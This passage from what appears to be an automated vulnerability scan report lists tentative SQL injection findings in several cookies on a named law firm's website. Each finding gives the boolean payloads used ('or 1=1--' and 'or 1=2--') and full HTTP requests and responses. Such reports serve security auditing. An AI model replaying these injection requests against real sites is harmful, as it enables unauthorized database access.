   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 21004035'%20or%201%3d1--%20 and 21004035'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:45:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 18408764'%20or%201%3d1--%20 and 18408764'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:45:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 63424578'%20or%201%3d1--%20 and 63424578'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:45:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 14004939'%20or%201%3d1--%20 and 14004939'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:45:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 12467860'%20or%201%3d1--%20 and 12467860'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:45:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
